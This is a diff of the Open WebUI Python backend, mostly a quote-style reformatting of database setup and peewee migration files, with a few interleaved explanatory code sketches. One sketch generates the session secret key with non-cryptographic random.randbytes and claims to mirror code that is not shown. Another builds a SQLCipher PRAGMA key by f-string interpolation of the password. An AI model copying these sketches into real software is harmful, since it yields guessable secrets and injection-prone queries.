+    host: str = '0.0.0.0',
     port: int = 8080,
     reload: bool = True,
 ):
     uvicorn.run(
-        "open_webui.main:app",
+        'open_webui.main:app',
         host=host,
         port=port,
         reload=reload,
-        forwarded_allow_ips="*",
+        forwarded_allow_ips='*',
     )

-if __name__ == "__main__":
+if __name__ == '__main__':
     app()
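On first run without WEBUI_SECRET_KEY, serve() persists a generated key so sessions survive restarts. The fallback reduces to the following (directly mirroring the lines above, extracted here for readability):

import base64
import random
from pathlib import Path

key_file = Path.cwd() / '.webui_secret_key'
if not key_file.exists():
    # 12 random bytes, base64-encoded, written once and reused afterwards
    key_file.write_bytes(base64.b64encode(random.randbytes(12)))
secret_key = key_file.read_text()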
backend/open_webui/internal/db.py  +20 −30  modified

@@ -56,25 +56,23 @@ def handle_peewee_migration(DATABASE_URL):
     # db = None
     try:
         # Replace the postgresql:// with postgres:// to handle the peewee migration
-        db = register_connection(DATABASE_URL.replace("postgresql://", "postgres://"))
-        migrate_dir = OPEN_WEBUI_DIR / "internal" / "migrations"
+        db = register_connection(DATABASE_URL.replace('postgresql://', 'postgres://'))
+        migrate_dir = OPEN_WEBUI_DIR / 'internal' / 'migrations'
         router = Router(db, logger=log, migrate_dir=migrate_dir)
         router.run()
         db.close()

     except Exception as e:
-        log.error(f"Failed to initialize the database connection: {e}")
-        log.warning(
-            "Hint: If your database password contains special characters, you may need to URL-encode it."
-        )
+        log.error(f'Failed to initialize the database connection: {e}')
+        log.warning('Hint: If your database password contains special characters, you may need to URL-encode it.')
         raise
     finally:
         # Properly closing the database connection
         if db and not db.is_closed():
             db.close()

         # Assert if db connection has been closed
-        assert db.is_closed(), "Database connection is still open."
+        assert db.is_closed(), 'Database connection is still open.'

 if ENABLE_DB_MIGRATIONS:
@@ -84,15 +82,13 @@ def handle_peewee_migration(DATABASE_URL):
 SQLALCHEMY_DATABASE_URL = DATABASE_URL

 # Handle SQLCipher URLs
-if SQLALCHEMY_DATABASE_URL.startswith("sqlite+sqlcipher://"):
-    database_password = os.environ.get("DATABASE_PASSWORD")
-    if not database_password or database_password.strip() == "":
-        raise ValueError(
-            "DATABASE_PASSWORD is required when using sqlite+sqlcipher:// URLs"
-        )
+if SQLALCHEMY_DATABASE_URL.startswith('sqlite+sqlcipher://'):
+    database_password = os.environ.get('DATABASE_PASSWORD')
+    if not database_password or database_password.strip() == '':
+        raise ValueError('DATABASE_PASSWORD is required when using sqlite+sqlcipher:// URLs')

     # Extract database path from SQLCipher URL
-    db_path = SQLALCHEMY_DATABASE_URL.replace("sqlite+sqlcipher://", "")
+    db_path = SQLALCHEMY_DATABASE_URL.replace('sqlite+sqlcipher://', '')

     # Create a custom creator function that uses sqlcipher3
     def create_sqlcipher_connection():
@@ -109,7 +105,7 @@ def create_sqlcipher_connection():
     # or QueuePool if DATABASE_POOL_SIZE is explicitly configured.
     if isinstance(DATABASE_POOL_SIZE, int) and DATABASE_POOL_SIZE > 0:
         engine = create_engine(
-            "sqlite://",
+            'sqlite://',
             creator=create_sqlcipher_connection,
             pool_size=DATABASE_POOL_SIZE,
             max_overflow=DATABASE_POOL_MAX_OVERFLOW,
@@ -121,28 +117,26 @@ def create_sqlcipher_connection():
         )
     else:
         engine = create_engine(
-            "sqlite://",
+            'sqlite://',
             creator=create_sqlcipher_connection,
             poolclass=NullPool,
             echo=False,
         )
-    log.info("Connected to encrypted SQLite database using SQLCipher")
+    log.info('Connected to encrypted SQLite database using SQLCipher')

-elif "sqlite" in SQLALCHEMY_DATABASE_URL:
-    engine = create_engine(
-        SQLALCHEMY_DATABASE_URL, connect_args={"check_same_thread": False}
-    )
+elif 'sqlite' in SQLALCHEMY_DATABASE_URL:
+    engine = create_engine(SQLALCHEMY_DATABASE_URL, connect_args={'check_same_thread': False})

     def on_connect(dbapi_connection, connection_record):
         cursor = dbapi_connection.cursor()
         if DATABASE_ENABLE_SQLITE_WAL:
-            cursor.execute("PRAGMA journal_mode=WAL")
+            cursor.execute('PRAGMA journal_mode=WAL')
         else:
-            cursor.execute("PRAGMA journal_mode=DELETE")
+            cursor.execute('PRAGMA journal_mode=DELETE')
         cursor.close()

-    event.listen(engine, "connect", on_connect)
+    event.listen(engine, 'connect', on_connect)
 else:
     if isinstance(DATABASE_POOL_SIZE, int):
         if DATABASE_POOL_SIZE > 0:
@@ -156,16 +150,12 @@ def on_connect(dbapi_connection, connection_record):
                 poolclass=QueuePool,
             )
         else:
-            engine = create_engine(
-                SQLALCHEMY_DATABASE_URL, pool_pre_ping=True, poolclass=NullPool
-            )
+            engine = create_engine(SQLALCHEMY_DATABASE_URL, pool_pre_ping=True, poolclass=NullPool)
     else:
         engine = create_engine(SQLALCHEMY_DATABASE_URL, pool_pre_ping=True)

-SessionLocal = sessionmaker(
-    autocommit=False, autoflush=False, bind=engine, expire_on_commit=False
-)
+SessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine, expire_on_commit=False)
 metadata_obj = MetaData(schema=DATABASE_SCHEMA)
 Base = declarative_base(metadata=metadata_obj)
 ScopedSession = scoped_session(SessionLocal)
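The SQLCipher branch builds the engine around a creator callable; the hunk above elides the factory body, but with the sqlcipher3 driver it would plausibly key the connection before returning it. A rough sketch under those assumptions (driver calls and the PRAGMA are not shown in the patch):

import os
import sqlcipher3  # assumed driver; only referenced indirectly in the diff

db_path = 'sqlite+sqlcipher:///app/data/webui.db'.replace('sqlite+sqlcipher://', '')

def create_sqlcipher_connection():
    conn = sqlcipher3.connect(db_path)
    # PRAGMA key must be the first statement and cannot use bound parameters.
    conn.execute(f"PRAGMA key = '{os.environ['DATABASE_PASSWORD']}'")
    return conn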
backend/open_webui/internal/migrations/001_initial_schema.py  +24 −24  modified

@@ -56,7 +56,7 @@ class Auth(pw.Model):
         active = pw.BooleanField()

         class Meta:
-            table_name = "auth"
+            table_name = 'auth'

     @migrator.create_model
     class Chat(pw.Model):
@@ -67,7 +67,7 @@ class Chat(pw.Model):
         timestamp = pw.BigIntegerField()

         class Meta:
-            table_name = "chat"
+            table_name = 'chat'

     @migrator.create_model
     class ChatIdTag(pw.Model):
@@ -78,7 +78,7 @@ class ChatIdTag(pw.Model):
         timestamp = pw.BigIntegerField()

         class Meta:
-            table_name = "chatidtag"
+            table_name = 'chatidtag'

     @migrator.create_model
     class Document(pw.Model):
@@ -92,7 +92,7 @@ class Document(pw.Model):
         timestamp = pw.BigIntegerField()

         class Meta:
-            table_name = "document"
+            table_name = 'document'

     @migrator.create_model
     class Modelfile(pw.Model):
@@ -103,7 +103,7 @@ class Modelfile(pw.Model):
         timestamp = pw.BigIntegerField()

         class Meta:
-            table_name = "modelfile"
+            table_name = 'modelfile'

     @migrator.create_model
     class Prompt(pw.Model):
@@ -115,7 +115,7 @@ class Prompt(pw.Model):
         timestamp = pw.BigIntegerField()

         class Meta:
-            table_name = "prompt"
+            table_name = 'prompt'

     @migrator.create_model
     class Tag(pw.Model):
@@ -125,7 +125,7 @@ class Tag(pw.Model):
         data = pw.TextField(null=True)

         class Meta:
-            table_name = "tag"
+            table_name = 'tag'

     @migrator.create_model
     class User(pw.Model):
@@ -137,7 +137,7 @@ class User(pw.Model):
         timestamp = pw.BigIntegerField()

         class Meta:
-            table_name = "user"
+            table_name = 'user'

 def migrate_external(migrator: Migrator, database: pw.Database, *, fake=False):
@@ -149,7 +149,7 @@ class Auth(pw.Model):
         active = pw.BooleanField()

         class Meta:
-            table_name = "auth"
+            table_name = 'auth'

     @migrator.create_model
     class Chat(pw.Model):
@@ -160,7 +160,7 @@ class Chat(pw.Model):
         timestamp = pw.BigIntegerField()

         class Meta:
-            table_name = "chat"
+            table_name = 'chat'

     @migrator.create_model
     class ChatIdTag(pw.Model):
@@ -171,7 +171,7 @@ class ChatIdTag(pw.Model):
         timestamp = pw.BigIntegerField()

         class Meta:
-            table_name = "chatidtag"
+            table_name = 'chatidtag'

     @migrator.create_model
     class Document(pw.Model):
@@ -185,7 +185,7 @@ class Document(pw.Model):
         timestamp = pw.BigIntegerField()

         class Meta:
-            table_name = "document"
+            table_name = 'document'

     @migrator.create_model
     class Modelfile(pw.Model):
@@ -196,7 +196,7 @@ class Modelfile(pw.Model):
         timestamp = pw.BigIntegerField()

         class Meta:
-            table_name = "modelfile"
+            table_name = 'modelfile'

     @migrator.create_model
     class Prompt(pw.Model):
@@ -208,7 +208,7 @@ class Prompt(pw.Model):
         timestamp = pw.BigIntegerField()

         class Meta:
-            table_name = "prompt"
+            table_name = 'prompt'

     @migrator.create_model
     class Tag(pw.Model):
@@ -218,7 +218,7 @@ class Tag(pw.Model):
         data = pw.TextField(null=True)

         class Meta:
-            table_name = "tag"
+            table_name = 'tag'

     @migrator.create_model
     class User(pw.Model):
@@ -230,24 +230,24 @@ class User(pw.Model):
         timestamp = pw.BigIntegerField()

         class Meta:
-            table_name = "user"
+            table_name = 'user'

 def rollback(migrator: Migrator, database: pw.Database, *, fake=False):
     """Write your rollback migrations here."""

-    migrator.remove_model("user")
+    migrator.remove_model('user')

-    migrator.remove_model("tag")
+    migrator.remove_model('tag')

-    migrator.remove_model("prompt")
+    migrator.remove_model('prompt')

-    migrator.remove_model("modelfile")
+    migrator.remove_model('modelfile')

-    migrator.remove_model("document")
+    migrator.remove_model('document')

-    migrator.remove_model("chatidtag")
+    migrator.remove_model('chatidtag')

-    migrator.remove_model("chat")
+    migrator.remove_model('chat')

-    migrator.remove_model("auth")
+    migrator.remove_model('auth')
backend/open_webui/internal/migrations/002_add_local_sharing.py  +2 −4  modified

@@ -36,12 +36,10 @@
 def migrate(migrator: Migrator, database: pw.Database, *, fake=False):
     """Write your migrations here."""

-    migrator.add_fields(
-        "chat", share_id=pw.CharField(max_length=255, null=True, unique=True)
-    )
+    migrator.add_fields('chat', share_id=pw.CharField(max_length=255, null=True, unique=True))

 def rollback(migrator: Migrator, database: pw.Database, *, fake=False):
     """Write your rollback migrations here."""

-    migrator.remove_fields("chat", "share_id")
+    migrator.remove_fields('chat', 'share_id')
backend/open_webui/internal/migrations/003_add_auth_api_key.py  +2 −4  modified

@@ -36,12 +36,10 @@
 def migrate(migrator: Migrator, database: pw.Database, *, fake=False):
     """Write your migrations here."""

-    migrator.add_fields(
-        "user", api_key=pw.CharField(max_length=255, null=True, unique=True)
-    )
+    migrator.add_fields('user', api_key=pw.CharField(max_length=255, null=True, unique=True))

 def rollback(migrator: Migrator, database: pw.Database, *, fake=False):
     """Write your rollback migrations here."""

-    migrator.remove_fields("user", "api_key")
+    migrator.remove_fields('user', 'api_key')
backend/open_webui/internal/migrations/004_add_archived.py  +2 −2  modified

@@ -36,10 +36,10 @@
 def migrate(migrator: Migrator, database: pw.Database, *, fake=False):
     """Write your migrations here."""

-    migrator.add_fields("chat", archived=pw.BooleanField(default=False))
+    migrator.add_fields('chat', archived=pw.BooleanField(default=False))

 def rollback(migrator: Migrator, database: pw.Database, *, fake=False):
     """Write your rollback migrations here."""

-    migrator.remove_fields("chat", "archived")
+    migrator.remove_fields('chat', 'archived')
backend/open_webui/internal/migrations/005_add_updated_at.py  +16 −20  modified

@@ -45,22 +45,20 @@ def migrate(migrator: Migrator, database: pw.Database, *, fake=False):
 def migrate_sqlite(migrator: Migrator, database: pw.Database, *, fake=False):
     # Adding fields created_at and updated_at to the 'chat' table
     migrator.add_fields(
-        "chat",
+        'chat',
         created_at=pw.DateTimeField(null=True),  # Allow null for transition
         updated_at=pw.DateTimeField(null=True),  # Allow null for transition
     )

     # Populate the new fields from an existing 'timestamp' field
-    migrator.sql(
-        "UPDATE chat SET created_at = timestamp, updated_at = timestamp WHERE timestamp IS NOT NULL"
-    )
+    migrator.sql('UPDATE chat SET created_at = timestamp, updated_at = timestamp WHERE timestamp IS NOT NULL')

     # Now that the data has been copied, remove the original 'timestamp' field
-    migrator.remove_fields("chat", "timestamp")
+    migrator.remove_fields('chat', 'timestamp')

     # Update the fields to be not null now that they are populated
     migrator.change_fields(
-        "chat",
+        'chat',
         created_at=pw.DateTimeField(null=False),
         updated_at=pw.DateTimeField(null=False),
     )

@@ -69,22 +67,20 @@ def migrate_sqlite(migrator: Migrator, database: pw.Database, *, fake=False):
 def migrate_external(migrator: Migrator, database: pw.Database, *, fake=False):
     # Adding fields created_at and updated_at to the 'chat' table
     migrator.add_fields(
-        "chat",
+        'chat',
         created_at=pw.BigIntegerField(null=True),  # Allow null for transition
         updated_at=pw.BigIntegerField(null=True),  # Allow null for transition
     )

     # Populate the new fields from an existing 'timestamp' field
-    migrator.sql(
-        "UPDATE chat SET created_at = timestamp, updated_at = timestamp WHERE timestamp IS NOT NULL"
-    )
+    migrator.sql('UPDATE chat SET created_at = timestamp, updated_at = timestamp WHERE timestamp IS NOT NULL')

     # Now that the data has been copied, remove the original 'timestamp' field
-    migrator.remove_fields("chat", "timestamp")
+    migrator.remove_fields('chat', 'timestamp')

     # Update the fields to be not null now that they are populated
     migrator.change_fields(
-        "chat",
+        'chat',
         created_at=pw.BigIntegerField(null=False),
         updated_at=pw.BigIntegerField(null=False),
     )

@@ -101,29 +97,29 @@ def rollback(migrator: Migrator, database: pw.Database, *, fake=False):
 def rollback_sqlite(migrator: Migrator, database: pw.Database, *, fake=False):
     # Recreate the timestamp field initially allowing null values for safe transition
-    migrator.add_fields("chat", timestamp=pw.DateTimeField(null=True))
+    migrator.add_fields('chat', timestamp=pw.DateTimeField(null=True))

     # Copy the earliest created_at date back into the new timestamp field
     # This assumes created_at was originally a copy of timestamp
-    migrator.sql("UPDATE chat SET timestamp = created_at")
+    migrator.sql('UPDATE chat SET timestamp = created_at')

     # Remove the created_at and updated_at fields
-    migrator.remove_fields("chat", "created_at", "updated_at")
+    migrator.remove_fields('chat', 'created_at', 'updated_at')

     # Finally, alter the timestamp field to not allow nulls if that was the original setting
-    migrator.change_fields("chat", timestamp=pw.DateTimeField(null=False))
+    migrator.change_fields('chat', timestamp=pw.DateTimeField(null=False))

 def rollback_external(migrator: Migrator, database: pw.Database, *, fake=False):
     # Recreate the timestamp field initially allowing null values for safe transition
-    migrator.add_fields("chat", timestamp=pw.BigIntegerField(null=True))
+    migrator.add_fields('chat', timestamp=pw.BigIntegerField(null=True))

     # Copy the earliest created_at date back into the new timestamp field
     # This assumes created_at was originally a copy of timestamp
-    migrator.sql("UPDATE chat SET timestamp = created_at")
+    migrator.sql('UPDATE chat SET timestamp = created_at')

     # Remove the created_at and updated_at fields
-    migrator.remove_fields("chat", "created_at", "updated_at")
+    migrator.remove_fields('chat', 'created_at', 'updated_at')

     # Finally, alter the timestamp field to not allow nulls if that was the original setting
-    migrator.change_fields("chat", timestamp=pw.BigIntegerField(null=False))
+    migrator.change_fields('chat', timestamp=pw.BigIntegerField(null=False))
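Both branches above follow the same data-preserving column swap: add nullable, backfill, drop the old column, then tighten the constraint. Sketched generically, using the peewee_migrate API exactly as it appears in this file:

import peewee as pw

def swap_column(migrator):
    # 1) add the new column as nullable so existing rows stay valid
    migrator.add_fields('chat', created_at=pw.BigIntegerField(null=True))
    # 2) backfill it from the column being retired
    migrator.sql('UPDATE chat SET created_at = timestamp WHERE timestamp IS NOT NULL')
    # 3) drop the old column once the data is copied
    migrator.remove_fields('chat', 'timestamp')
    # 4) enforce NOT NULL now that every row is populated
    migrator.change_fields('chat', created_at=pw.BigIntegerField(null=False))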
backend/open_webui/internal/migrations/006_migrate_timestamps_and_charfields.py  +20 −20  modified

@@ -38,45 +38,45 @@ def migrate(migrator: Migrator, database: pw.Database, *, fake=False):
     # Alter the tables with timestamps
     migrator.change_fields(
-        "chatidtag",
+        'chatidtag',
         timestamp=pw.BigIntegerField(),
     )
     migrator.change_fields(
-        "document",
+        'document',
         timestamp=pw.BigIntegerField(),
     )
     migrator.change_fields(
-        "modelfile",
+        'modelfile',
         timestamp=pw.BigIntegerField(),
     )
     migrator.change_fields(
-        "prompt",
+        'prompt',
         timestamp=pw.BigIntegerField(),
     )
     migrator.change_fields(
-        "user",
+        'user',
         timestamp=pw.BigIntegerField(),
     )
     # Alter the tables with varchar to text where necessary
     migrator.change_fields(
-        "auth",
+        'auth',
         password=pw.TextField(),
     )
     migrator.change_fields(
-        "chat",
+        'chat',
         title=pw.TextField(),
     )
     migrator.change_fields(
-        "document",
+        'document',
         title=pw.TextField(),
         filename=pw.TextField(),
     )
     migrator.change_fields(
-        "prompt",
+        'prompt',
         title=pw.TextField(),
     )
     migrator.change_fields(
-        "user",
+        'user',
         profile_image_url=pw.TextField(),
     )

@@ -87,43 +87,43 @@ def rollback(migrator: Migrator, database: pw.Database, *, fake=False):
     if isinstance(database, pw.SqliteDatabase):
         # Alter the tables with timestamps
         migrator.change_fields(
-            "chatidtag",
+            'chatidtag',
             timestamp=pw.DateField(),
         )
         migrator.change_fields(
-            "document",
+            'document',
             timestamp=pw.DateField(),
         )
         migrator.change_fields(
-            "modelfile",
+            'modelfile',
             timestamp=pw.DateField(),
         )
         migrator.change_fields(
-            "prompt",
+            'prompt',
             timestamp=pw.DateField(),
         )
         migrator.change_fields(
-            "user",
+            'user',
             timestamp=pw.DateField(),
         )

     migrator.change_fields(
-        "auth",
+        'auth',
         password=pw.CharField(max_length=255),
     )
     migrator.change_fields(
-        "chat",
+        'chat',
         title=pw.CharField(),
     )
     migrator.change_fields(
-        "document",
+        'document',
         title=pw.CharField(),
         filename=pw.CharField(),
     )
     migrator.change_fields(
-        "prompt",
+        'prompt',
         title=pw.CharField(),
     )
     migrator.change_fields(
-        "user",
+        'user',
         profile_image_url=pw.CharField(),
     )
backend/open_webui/internal/migrations/007_add_user_last_active_at.py  +6 −6  modified

@@ -38,7 +38,7 @@ def migrate(migrator: Migrator, database: pw.Database, *, fake=False):
     # Adding fields created_at and updated_at to the 'user' table
     migrator.add_fields(
-        "user",
+        'user',
         created_at=pw.BigIntegerField(null=True),  # Allow null for transition
         updated_at=pw.BigIntegerField(null=True),  # Allow null for transition
         last_active_at=pw.BigIntegerField(null=True),  # Allow null for transition
@@ -50,11 +50,11 @@ def migrate(migrator: Migrator, database: pw.Database, *, fake=False):
     )

     # Now that the data has been copied, remove the original 'timestamp' field
-    migrator.remove_fields("user", "timestamp")
+    migrator.remove_fields('user', 'timestamp')

     # Update the fields to be not null now that they are populated
     migrator.change_fields(
-        "user",
+        'user',
         created_at=pw.BigIntegerField(null=False),
         updated_at=pw.BigIntegerField(null=False),
         last_active_at=pw.BigIntegerField(null=False),
@@ -65,14 +65,14 @@ def rollback(migrator: Migrator, database: pw.Database, *, fake=False):
     """Write your rollback migrations here."""

     # Recreate the timestamp field initially allowing null values for safe transition
-    migrator.add_fields("user", timestamp=pw.BigIntegerField(null=True))
+    migrator.add_fields('user', timestamp=pw.BigIntegerField(null=True))

     # Copy the earliest created_at date back into the new timestamp field
     # This assumes created_at was originally a copy of timestamp
     migrator.sql('UPDATE "user" SET timestamp = created_at')

     # Remove the created_at and updated_at fields
-    migrator.remove_fields("user", "created_at", "updated_at", "last_active_at")
+    migrator.remove_fields('user', 'created_at', 'updated_at', 'last_active_at')

     # Finally, alter the timestamp field to not allow nulls if that was the original setting
-    migrator.change_fields("user", timestamp=pw.BigIntegerField(null=False))
+    migrator.change_fields('user', timestamp=pw.BigIntegerField(null=False))
backend/open_webui/internal/migrations/008_add_memory.py  +2 −2  modified

@@ -43,10 +43,10 @@ class Memory(pw.Model):
         created_at = pw.BigIntegerField(null=False)

         class Meta:
-            table_name = "memory"
+            table_name = 'memory'

 def rollback(migrator: Migrator, database: pw.Database, *, fake=False):
     """Write your rollback migrations here."""

-    migrator.remove_model("memory")
+    migrator.remove_model('memory')
backend/open_webui/internal/migrations/009_add_models.py  +2 −2  modified

@@ -51,10 +51,10 @@ class Model(pw.Model):
         updated_at = pw.BigIntegerField(null=False)

         class Meta:
-            table_name = "model"
+            table_name = 'model'

 def rollback(migrator: Migrator, database: pw.Database, *, fake=False):
     """Write your rollback migrations here."""

-    migrator.remove_model("model")
+    migrator.remove_model('model')
backend/open_webui/internal/migrations/010_migrate_modelfiles_to_models.py  +24 −24  modified

@@ -42,12 +42,12 @@ def migrate(migrator: Migrator, database: pw.Database, *, fake=False):
     # Fetch data from 'modelfile' table and insert into 'model' table
     migrate_modelfile_to_model(migrator, database)
     # Drop the 'modelfile' table
-    migrator.remove_model("modelfile")
+    migrator.remove_model('modelfile')

 def migrate_modelfile_to_model(migrator: Migrator, database: pw.Database):
-    ModelFile = migrator.orm["modelfile"]
-    Model = migrator.orm["model"]
+    ModelFile = migrator.orm['modelfile']
+    Model = migrator.orm['model']

     modelfiles = ModelFile.select()

@@ -57,25 +57,25 @@ def migrate_modelfile_to_model(migrator: Migrator, database: pw.Database):
         modelfile.modelfile = json.loads(modelfile.modelfile)
         meta = json.dumps(
             {
-                "description": modelfile.modelfile.get("desc"),
-                "profile_image_url": modelfile.modelfile.get("imageUrl"),
-                "ollama": {"modelfile": modelfile.modelfile.get("content")},
-                "suggestion_prompts": modelfile.modelfile.get("suggestionPrompts"),
-                "categories": modelfile.modelfile.get("categories"),
-                "user": {**modelfile.modelfile.get("user", {}), "community": True},
+                'description': modelfile.modelfile.get('desc'),
+                'profile_image_url': modelfile.modelfile.get('imageUrl'),
+                'ollama': {'modelfile': modelfile.modelfile.get('content')},
+                'suggestion_prompts': modelfile.modelfile.get('suggestionPrompts'),
+                'categories': modelfile.modelfile.get('categories'),
+                'user': {**modelfile.modelfile.get('user', {}), 'community': True},
             }
         )

-        info = parse_ollama_modelfile(modelfile.modelfile.get("content"))
+        info = parse_ollama_modelfile(modelfile.modelfile.get('content'))

         # Insert the processed data into the 'model' table
         Model.create(
-            id=f"ollama-{modelfile.tag_name}",
+            id=f'ollama-{modelfile.tag_name}',
             user_id=modelfile.user_id,
-            base_model_id=info.get("base_model_id"),
-            name=modelfile.modelfile.get("title"),
+            base_model_id=info.get('base_model_id'),
+            name=modelfile.modelfile.get('title'),
             meta=meta,
-            params=json.dumps(info.get("params", {})),
+            params=json.dumps(info.get('params', {})),
             created_at=modelfile.timestamp,
             updated_at=modelfile.timestamp,
         )

@@ -86,7 +86,7 @@ def rollback(migrator: Migrator, database: pw.Database, *, fake=False):
     recreate_modelfile_table(migrator, database)
     move_data_back_to_modelfile(migrator, database)
-    migrator.remove_model("model")
+    migrator.remove_model('model')

 def recreate_modelfile_table(migrator: Migrator, database: pw.Database):
@@ -102,8 +102,8 @@ def recreate_modelfile_table(migrator: Migrator, database: pw.Database):

 def move_data_back_to_modelfile(migrator: Migrator, database: pw.Database):
-    Model = migrator.orm["model"]
-    Modelfile = migrator.orm["modelfile"]
+    Model = migrator.orm['model']
+    Modelfile = migrator.orm['modelfile']

     models = Model.select()

@@ -112,13 +112,13 @@ def move_data_back_to_modelfile(migrator: Migrator, database: pw.Database):
         meta = json.loads(model.meta)

         modelfile_data = {
-            "title": model.name,
-            "desc": meta.get("description"),
-            "imageUrl": meta.get("profile_image_url"),
-            "content": meta.get("ollama", {}).get("modelfile"),
-            "suggestionPrompts": meta.get("suggestion_prompts"),
-            "categories": meta.get("categories"),
-            "user": {k: v for k, v in meta.get("user", {}).items() if k != "community"},
+            'title': model.name,
+            'desc': meta.get('description'),
+            'imageUrl': meta.get('profile_image_url'),
+            'content': meta.get('ollama', {}).get('modelfile'),
+            'suggestionPrompts': meta.get('suggestion_prompts'),
+            'categories': meta.get('categories'),
+            'user': {k: v for k, v in meta.get('user', {}).items() if k != 'community'},
         }

         # Insert the processed data back into the 'modelfile' table
backend/open_webui/internal/migrations/011_add_user_settings.py  +2 −2  modified

@@ -37,11 +37,11 @@ def migrate(migrator: Migrator, database: pw.Database, *, fake=False):
     """Write your migrations here."""

     # Adding fields settings to the 'user' table
-    migrator.add_fields("user", settings=pw.TextField(null=True))
+    migrator.add_fields('user', settings=pw.TextField(null=True))

 def rollback(migrator: Migrator, database: pw.Database, *, fake=False):
     """Write your rollback migrations here."""

     # Remove the settings field
-    migrator.remove_fields("user", "settings")
+    migrator.remove_fields('user', 'settings')
backend/open_webui/internal/migrations/012_add_tools.py  +2 −2  modified

@@ -51,10 +51,10 @@ class Tool(pw.Model):
         updated_at = pw.BigIntegerField(null=False)

         class Meta:
-            table_name = "tool"
+            table_name = 'tool'

 def rollback(migrator: Migrator, database: pw.Database, *, fake=False):
     """Write your rollback migrations here."""

-    migrator.remove_model("tool")
+    migrator.remove_model('tool')
backend/open_webui/internal/migrations/013_add_user_info.py  +2 −2  modified

@@ -37,11 +37,11 @@ def migrate(migrator: Migrator, database: pw.Database, *, fake=False):
     """Write your migrations here."""

     # Adding fields info to the 'user' table
-    migrator.add_fields("user", info=pw.TextField(null=True))
+    migrator.add_fields('user', info=pw.TextField(null=True))

 def rollback(migrator: Migrator, database: pw.Database, *, fake=False):
     """Write your rollback migrations here."""

     # Remove the settings field
-    migrator.remove_fields("user", "info")
+    migrator.remove_fields('user', 'info')
backend/open_webui/internal/migrations/014_add_files.py  +2 −2  modified

@@ -45,10 +45,10 @@ class File(pw.Model):
         created_at = pw.BigIntegerField(null=False)

         class Meta:
-            table_name = "file"
+            table_name = 'file'

 def rollback(migrator: Migrator, database: pw.Database, *, fake=False):
     """Write your rollback migrations here."""

-    migrator.remove_model("file")
+    migrator.remove_model('file')
backend/open_webui/internal/migrations/015_add_functions.py  +2 −2  modified

@@ -51,10 +51,10 @@ class Function(pw.Model):
         updated_at = pw.BigIntegerField(null=False)

         class Meta:
-            table_name = "function"
+            table_name = 'function'

 def rollback(migrator: Migrator, database: pw.Database, *, fake=False):
     """Write your rollback migrations here."""

-    migrator.remove_model("function")
+    migrator.remove_model('function')
backend/open_webui/internal/migrations/016_add_valves_and_is_active.py  +6 −6  modified

@@ -36,14 +36,14 @@
 def migrate(migrator: Migrator, database: pw.Database, *, fake=False):
     """Write your migrations here."""

-    migrator.add_fields("tool", valves=pw.TextField(null=True))
-    migrator.add_fields("function", valves=pw.TextField(null=True))
-    migrator.add_fields("function", is_active=pw.BooleanField(default=False))
+    migrator.add_fields('tool', valves=pw.TextField(null=True))
+    migrator.add_fields('function', valves=pw.TextField(null=True))
+    migrator.add_fields('function', is_active=pw.BooleanField(default=False))

 def rollback(migrator: Migrator, database: pw.Database, *, fake=False):
     """Write your rollback migrations here."""

-    migrator.remove_fields("tool", "valves")
-    migrator.remove_fields("function", "valves")
-    migrator.remove_fields("function", "is_active")
+    migrator.remove_fields('tool', 'valves')
+    migrator.remove_fields('function', 'valves')
+    migrator.remove_fields('function', 'is_active')
backend/open_webui/internal/migrations/017_add_user_oauth_sub.py  +2 −2  modified

@@ -33,12 +33,12 @@
 def migrate(migrator: Migrator, database: pw.Database, *, fake=False):
     """Write your migrations here."""

     migrator.add_fields(
-        "user",
+        'user',
         oauth_sub=pw.TextField(null=True, unique=True),
     )

 def rollback(migrator: Migrator, database: pw.Database, *, fake=False):
     """Write your rollback migrations here."""

-    migrator.remove_fields("user", "oauth_sub")
+    migrator.remove_fields('user', 'oauth_sub')
backend/open_webui/internal/migrations/018_add_function_is_global.py  +2 −2  modified

@@ -37,12 +37,12 @@
 def migrate(migrator: Migrator, database: pw.Database, *, fake=False):
     """Write your migrations here."""

     migrator.add_fields(
-        "function",
+        'function',
         is_global=pw.BooleanField(default=False),
     )

 def rollback(migrator: Migrator, database: pw.Database, *, fake=False):
     """Write your rollback migrations here."""

-    migrator.remove_fields("function", "is_global")
+    migrator.remove_fields('function', 'is_global')
backend/open_webui/internal/wrappers.py  +15 −17  modified

@@ -10,13 +10,13 @@
 log = logging.getLogger(__name__)

-db_state_default = {"closed": None, "conn": None, "ctx": None, "transactions": None}
-db_state = ContextVar("db_state", default=db_state_default.copy())
+db_state_default = {'closed': None, 'conn': None, 'ctx': None, 'transactions': None}
+db_state = ContextVar('db_state', default=db_state_default.copy())

 class PeeweeConnectionState(object):
     def __init__(self, **kwargs):
-        super().__setattr__("_state", db_state)
+        super().__setattr__('_state', db_state)
         super().__init__(**kwargs)

     def __setattr__(self, name, value):
@@ -30,10 +30,10 @@ def __getattr__(self, name):
 class CustomReconnectMixin(ReconnectMixin):
     reconnect_errors = (
         # psycopg2
-        (OperationalError, "termin"),
-        (InterfaceError, "closed"),
+        (OperationalError, 'termin'),
+        (InterfaceError, 'closed'),
         # peewee
-        (PeeWeeInterfaceError, "closed"),
+        (PeeWeeInterfaceError, 'closed'),
     )

@@ -43,23 +43,21 @@ class ReconnectingPostgresqlDatabase(CustomReconnectMixin, PostgresqlDatabase):
 def register_connection(db_url):
     # Check if using SQLCipher protocol
-    if db_url.startswith("sqlite+sqlcipher://"):
-        database_password = os.environ.get("DATABASE_PASSWORD")
-        if not database_password or database_password.strip() == "":
-            raise ValueError(
-                "DATABASE_PASSWORD is required when using sqlite+sqlcipher:// URLs"
-            )
+    if db_url.startswith('sqlite+sqlcipher://'):
+        database_password = os.environ.get('DATABASE_PASSWORD')
+        if not database_password or database_password.strip() == '':
+            raise ValueError('DATABASE_PASSWORD is required when using sqlite+sqlcipher:// URLs')

         from playhouse.sqlcipher_ext import SqlCipherDatabase

         # Parse the database path from SQLCipher URL
         # Convert sqlite+sqlcipher:///path/to/db.sqlite to /path/to/db.sqlite
-        db_path = db_url.replace("sqlite+sqlcipher://", "")
+        db_path = db_url.replace('sqlite+sqlcipher://', '')

         # Use Peewee's native SqlCipherDatabase with encryption
         db = SqlCipherDatabase(db_path, passphrase=database_password)
         db.autoconnect = True
         db.reuse_if_open = True
-        log.info("Connected to encrypted SQLite database using SQLCipher")
+        log.info('Connected to encrypted SQLite database using SQLCipher')
     else:
         # Standard database connection (existing logic)
@@ -68,7 +66,7 @@ def register_connection(db_url):
             # Enable autoconnect for SQLite databases, managed by Peewee
             db.autoconnect = True
             db.reuse_if_open = True
-            log.info("Connected to PostgreSQL database")
+            log.info('Connected to PostgreSQL database')

             # Get the connection details
